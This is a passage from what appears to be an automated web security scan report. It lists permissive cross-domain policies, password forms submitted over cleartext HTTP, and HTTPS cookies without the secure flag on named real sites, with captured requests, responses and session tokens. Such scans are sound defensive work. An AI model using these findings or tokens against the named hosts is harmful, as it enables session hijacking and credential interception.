Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:04:08 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Thu, 19 May 2011 11:04:08 GMT
Last-Modified: Mon, 19 Oct 2009 01:46:36 GMT
ETag: "ff-4adbc4fc"
Accept-Ranges: bytes
Content-Length: 255
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resource path="/" include-subpaths="true" />
</grant
...[SNIP]...

7. Cleartext submission of password
There are 9 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


7.1. http://secniche.org:2082/tmp/secniche/webalizer//usage_201105.html

Summary

Severity:   High
Confidence:   Certain
Host:   http://secniche.org:2082
Path:   /tmp/secniche/webalizer//usage_201105.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /tmp/secniche/webalizer//usage_201105.html HTTP/1.1
Host: secniche.org:2082
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 401 Access Denied
WWW-Authenticate: Basic realm="cPanel"
Connection: close
Set-Cookie: logintheme=cpanel; path=/; HttpOnly; port=2082
Set-Cookie: cprelogin=no; path=/; HttpOnly; port=2082
Set-Cookie: cpsession=c8nOrrFvbqOSWIwMKTiLmobUg7nWh12n8Lm0BmUzByVMqdJtCxzFc9g5YnYZNbpn; path=/; HttpOnly; port=2082
Server: cpsrvd/11.28.87
Content-type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<link rel="shortcut icon" h
...[SNIP]...
<div id="content-wrap" align="center">

<form action="/login/" method="post" >
<input type="hidden" name="login_theme" value="cpanel" />
...[SNIP]...
<td class="login_lines"><input id="pass" type="password" name="pass" size="16" tabindex="2" /></td>
...[SNIP]...

7.2. http://www.digiware.net/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.digiware.net
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.digiware.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 13:06:43 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.1.6
Set-Cookie: f165d946d0a4013e03ebd5d7edb21d2c=bqhecm8n2rb4cadkusa5gg38q1; path=/
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Thu, 12 May 2011 13:06:43 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 19619


<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<td><form action="/index.php" method="post" name="login" class="form-login">
<div align="center">
...[SNIP]...
<p align="center">Clave&nbsp;
<input name="passwd" type="password" class="textfields" id="mod_login_password" alt="Contrase..a" /></p>
...[SNIP]...

7.3. http://www.huroncapital.com/secure/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.huroncapital.com
Path:   /secure/

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /secure/ HTTP/1.1
Host: www.huroncapital.com
Proxy-Connection: keep-alive
Referer: http://www.huroncapital.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:13:52 GMT
Server: Apache/1.3.37 (Unix)
AuthUser: -
Set-Cookie: SESSIONID=9d65c422a80d78d0b2c9cee35d9a8062; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 8870

<html>

   <head>
       <meta http-equiv="Content-Language" content="en-us">
       <meta http-equiv="Content-Type" content="text/html; charset=windows-1252">
       <meta name="generator" content="Adobe GoLive
...[SNIP]...
</P>

<form method="post" action="index.html" name="loginform">
<div align="center">
...[SNIP]...
<td><input name="password" type="password" size="20" maxlength="50"></td>
...[SNIP]...

7.4. http://www.pillsburylaw.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?q=Pillsbury+Winthrop+Shaw+Pittman&ie=utf-8&oe=utf-8&aq=t&rls=org.mozilla:en-US:official&client=firefox-a

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812913;path=/
Set-Cookie: CFTOKEN=26160612;path=/
Set-Cookie: PCONNECTID=;path=/
Set-Cookie: PCUSERNAME=;path=/
Set-Cookie: MEDIAUSERID=;path=/
Set-Cookie: MEDIAUSERNAME=;path=/
Date: Thu, 12 May 2011 12:22:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
</div>
                   <FORM action="/index.cfm?pageID=60" id="pcLogin" name="pcLogin" method="post" class="form">
                   <label>
...[SNIP]...
<input id="password-clear" type="text" value="Password" style="display:none;width:94%;"/>
                       <input type="password" name="pcpassword" id="pcpassword" value="" class="required" alias="Password" style="width:94%;">
                   </label>
...[SNIP]...

7.5. http://www.pillsburylaw.com/index.cfm

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.pillsburylaw.com
Path:   /index.cfm

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /index.cfm?pageID=60 HTTP/1.1
Host: www.pillsburylaw.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.pillsburylaw.com/index.cfm?pageid=12&itemid=1908
Cookie: CFID=11812912; CFTOKEN=34459793; PCONNECTID=; PCUSERNAME=; MEDIAUSERID=; MEDIAUSERNAME=; __utma=249287046.1504885052.1305202905.1305202905.1305202905.1; __utmb=249287046.2.10.1305202905; __utmc=249287046; __utmz=249287046.1305202905.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Pillsbury%20Winthrop%20Shaw%20Pittman; hubspotdt=2011-05-12%2008%3A21%3A46; hubspotutk=148ff71c54bf42a7b313024966931ee5; hubspotvd=148ff71c54bf42a7b313024966931ee5; hubspotvw=148ff71c54bf42a7b313024966931ee5; hubspotvm=148ff71c54bf42a7b313024966931ee5; hsfirstvisit=http%3A%2F%2Fwww.pillsburylaw.com%2F|http%3A%2F%2Fwww.google.com%2Fsearch%3Fq%3DPillsbury%2BWinthrop%2BShaw%2BPittman%26ie%3Dutf-8%26oe%3Dutf-8%26aq%3Dt%26rls%3Dorg.mozilla%3Aen-US%3Aofficial%26client%3Dfirefox-a|2011-05-12%2008%3A21%3A46

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=11812912;path=/
Set-Cookie: CFTOKEN=34459793;path=/
Date: Thu, 12 May 2011 12:31:44 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<META HTTP-EQUIV="Co
...[SNIP]...
<div class="box" id="loginbox">

   <FORM action="/index.cfm?pageID=60" id="pcLogin" name="pcLogin" method="post" class="form">
   <h2>
...[SNIP]...
<input id="password-clear" type="text" value="Password" style="display:none;width:94%;"/>
       <input type="password" name="pcpassword" id="pcpassword" value="" class="required" alias="Password" style="width:94%;">
   </label>
...[SNIP]...

7.6. http://www.privateequityinfo.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.privateequityinfo.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.privateequityinfo.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:02:22 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.15
Set-Cookie: PHPSESSID=eq1oat81k7im20tchffed7ii03; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 25258

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Private Equity Firms, Hedge Funds, Mezzanine Investors, Small Business Investment Companies (SBIC), Valuation Fi
...[SNIP]...
a regularly updated database of hundreds of firms and thousands of contacts, Private Equity Info is a valuable resource for information on financial buyers, mezzanine investors and hedge funds.">
           <form action="login.php" method="post" name="f" onSubmit="return encrypt(this);">
               <tr>
...[SNIP]...
<td align="right"><input type="password" name="password" size="20" class="formFieldN" tabindex="2" id="passa" onfocus="changecss('passa', 'Password', 'nformFieldN','password', this);" onblur="backcss('passa', 'Password', 'formFieldN','text', this);" value="Password"/></td>
...[SNIP]...

7.7. http://www.privateequityinfo.com/forgotpassword.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.privateequityinfo.com
Path:   /forgotpassword.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /forgotpassword.php HTTP/1.1
Host: www.privateequityinfo.com
Proxy-Connection: keep-alive
Referer: http://www.privateequityinfo.com/product_details.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bvv46lr2q5ms0uqefrt9jbsal0; __utma=222922074.264370130.1305198145.1305198145.1305198145.1; __utmc=222922074; __utmz=222922074.1305198145.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __utmb=222922074

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:14:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.15
Content-Type: text/html
Content-Length: 21431

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Private Equity Info - Forgot Your Password?</title>
<meta name="description" content="Database of private equit
...[SNIP]...
a regularly updated database of hundreds of firms and thousands of contacts, Private Equity Info is a valuable resource for information on financial buyers, mezzanine investors and hedge funds.">
           <form action="login.php" method="post" name="f" onSubmit="return encrypt(this);">
               <tr>
...[SNIP]...
<td align="right"><input type="password" name="password" size="20" class="formFieldN" tabindex="2" id="passa" onfocus="changecss('passa', 'Password', 'nformFieldN','password', this);" onblur="backcss('passa', 'Password', 'formFieldN','text', this);" value="Password"/></td>
...[SNIP]...

7.8. http://www.privateequityinfo.com/product_details.php

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.privateequityinfo.com
Path:   /product_details.php

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET /product_details.php HTTP/1.1
Host: www.privateequityinfo.com
Proxy-Connection: keep-alive
Referer: http://www.privateequityinfo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=bvv46lr2q5ms0uqefrt9jbsal0; __utma=222922074.264370130.1305198145.1305198145.1305198145.1; __utmb=222922074; __utmc=222922074; __utmz=222922074.1305198145.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 11:14:29 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.15
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Type: text/html
Content-Length: 58851

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>Product details</title>
<meta name="description" content="Database of Private Equity Firms, Hedge Funds, Mezzan
...[SNIP]...
a regularly updated database of hundreds of firms and thousands of contacts, Private Equity Info is a valuable resource for information on financial buyers, mezzanine investors and hedge funds.">
           <form action="login.php" method="post" name="f" onSubmit="return encrypt(this);">
               <tr>
...[SNIP]...
<td align="right"><input type="password" name="password" size="20" class="formFieldN" tabindex="2" id="passa" onfocus="changecss('passa', 'Password', 'nformFieldN','password', this);" onblur="backcss('passa', 'Password', 'formFieldN','text', this);" value="Password"/></td>
...[SNIP]...

7.9. http://www.soundpatheview.com/

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.soundpatheview.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:

The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.soundpatheview.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.tuckerellis.com/info/client-access

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:25:02 GMT
Server: Apache/2.0.54
X-Powered-By: PHP/4.4.9
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 4191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <title
...[SNIP]...
<div id="form_mods">
               <form id="hostform" action="">
                   <div class="form_cont">
...[SNIP]...
</div>
        <input type="password" id="host_pin" name="Password" title="Pin" maxlength="17" value="" />
        <div>
...[SNIP]...

8. SSL cookie without secure flag set
There are 20 instances of this issue:

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.


8.1. https://ams-legal.net/support/default.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://ams-legal.net
Path:   /support/default.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /support/default.asp HTTP/1.1
Host: ams-legal.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.ams-legal.com/services_and_support.asp
Cookie: ASPSESSIONIDACBSASQD=JACKKCLBCMGCKCLIKDFBNIEK; ASPSESSIONIDSQCDBTRB=FEGHIDNBDBEOJFOALCNPEOKK

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:32:27 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 403
Content-Type: text/html
Expires: Thu, 12 May 2011 12:32:27 GMT
Set-Cookie: ASPSESSIONIDQSCDBTRB=GJGHIDNBJPFJKBPOAGHLPKEK; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <title>AMS Legal Collaborator</title>
</head>
<frameset rows="100%,0" border="0">
   <frame name="MainPnl" src="Logi
...[SNIP]...

8.2. https://ams-legal.net/tuckerellis/Image.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://ams-legal.net
Path:   /tuckerellis/Image.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tuckerellis/Image.asp?Name=login-bar.png HTTP/1.1
Host: ams-legal.net
Connection: keep-alive
Referer: https://ams-legal.net/tuckerellis/Login.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQCDBTRB=PDGHIDNBEPFJCBKCFFIABLCC

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:25:38 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: ASPSESSIONIDACBSASQD=NACKKCLBMLGHAKOHOFLAAKAL; path=/
Cache-control: private
Content-Length: 0


8.3. https://ams-legal.net/tuckerellis/Login.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://ams-legal.net
Path:   /tuckerellis/Login.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tuckerellis/Login.asp HTTP/1.1
Host: ams-legal.net
Connection: keep-alive
Referer: https://ams-legal.net/tuckerellis/default.asp
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASPSESSIONIDSQCDBTRB=PDGHIDNBEPFJCBKCFFIABLCC

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:25:32 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 2815
Content-Type: text/html
Expires: Thu, 12 May 2011 12:25:32 GMT
Set-Cookie: ASPSESSIONIDACBSASQD=DACKKCLBEDJNFIFEHJMOIFOI; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0//EN" "http://www.w3.org/TR/REC-html40/strict.dtd">
<html>
<head>
<title>AMS Legal Collaborator</title>
<link rel="stylesheet" type="text/css" href="Lo
...[SNIP]...

8.4. https://ams-legal.net/tuckerellis/default.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://ams-legal.net
Path:   /tuckerellis/default.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tuckerellis/default.asp HTTP/1.1
Host: ams-legal.net
Connection: keep-alive
Referer: https://ams-legal.net/tuckerellis/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:25:30 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 403
Content-Type: text/html
Expires: Thu, 12 May 2011 12:25:30 GMT
Set-Cookie: ASPSESSIONIDSQCDBTRB=AEGHIDNBPNJAPLEFPMPOEJNA; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <title>AMS Legal Collaborator</title>
</head>
<frameset rows="100%,0" border="0">
   <frame name="MainPnl" src="Logi
...[SNIP]...

8.5. https://ams-legal.net/tuckerellis/default.asp

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://ams-legal.net
Path:   /tuckerellis/default.asp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tuckerellis/default.asp HTTP/1.1
Host: ams-legal.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 12:25:35 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Pragma: no-cache
cache-control: no-cache, no-store
Content-Length: 403
Content-Type: text/html
Expires: Thu, 12 May 2011 12:25:35 GMT
Set-Cookie: ASPSESSIONIDACBSASQD=JACKKCLBCMGCKCLIKDFBNIEK; path=/
Cache-control: private


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
   <title>AMS Legal Collaborator</title>
</head>
<frameset rows="100%,0" border="0">
   <frame name="MainPnl" src="Logi
...[SNIP]...

8.6. https://cle-files.tuckerellis.com/

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cle-files.tuckerellis.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: cle-files.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://www.tuckerellis.com/info/client-access
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.9.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Thu, 12 May 2011 12:25:44 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: _filetransfer_session=bd9523d5f7e3fb1ae566f67f03d46ec0; path=/; expires=Thu, 19 May 2011 12:25:44 GMT; HttpOnly
Status: 200
ETag: "db2b9a193cf2f30f9560e02ce35abe4a"
X-Runtime: 33
Cache-Control: private, max-age=0, must-revalidate
Content-Length: 3378

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<meta htt
...[SNIP]...

8.7. https://cle-files.tuckerellis.com/password_reset

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://cle-files.tuckerellis.com
Path:   /password_reset

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /password_reset HTTP/1.1
Host: cle-files.tuckerellis.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0.1) Gecko/20100101 Firefox/4.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://cle-files.tuckerellis.com/
Cookie: __utma=58675247.1267848493.1305202904.1305202904.1305202904.1; __utmb=58675247.9.10.1305202904; __utmc=58675247; __utmz=58675247.1305202904.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=Tucker%20Ellis%20%26%20West; _filetransfer_session=9f3e69b83e302794ac0d585e9faf9b16

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Thu, 12 May 2011 12:26:02 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Set-Cookie: _filetransfer_session=9f3e69b83e302794ac0d585e9faf9b16; path=/; expires=Thu, 19 May 2011 12:26:02 GMT; HttpOnly
Status: 200
ETag: "c35a5d194717fba9ea024de383afe46e"
X-Runtime: 60
Cache-Control: private, max-age=0, must-revalidate
